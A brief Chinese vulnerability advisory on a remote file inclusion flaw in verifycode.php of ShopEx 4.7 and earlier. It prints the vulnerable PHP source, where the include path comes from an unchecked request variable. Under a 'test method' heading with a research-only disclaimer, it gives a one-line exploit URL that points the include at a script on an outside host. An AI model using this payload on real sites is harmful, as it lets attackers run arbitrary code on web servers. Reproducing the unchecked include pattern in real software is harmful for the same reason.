影响版本:
ShopEx <= 4.7
漏洞描述:
verifycode.php <?php /** * * 登陆验证码生成文件 * * @package ShopEx网上商店系统 * @version 4.6 * @author ShopEx.cn <> * @url * @since PHP 4.3 * @copyright ShopEx.cn * **/ if (!defined("ISSHOP")) { Header("Location:../index.php"); exit; } /* 调用 session 文件 */ include_once($INC_SYSHOMEDIR."include/session.inc.php"); mt_srand((double)microtime() * 1000000); /* 生成验证码 */ $strValidate = mt_rand(1000, 9999); session_unregister("RANDOM_CODE"); session_register("RANDOM_CODE"); $_SESSION["RANDOM_CODE"] = $strValidate.""; $verifyImg = newclass("verifyCode", $strValidate); /* 输出验证码图片 */ $verifyImg->Output(); ?>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
shop/verifycode.php?INC_SYSHOMEDIR=http://www.0xss.cn/xx.txt?
0 条评论。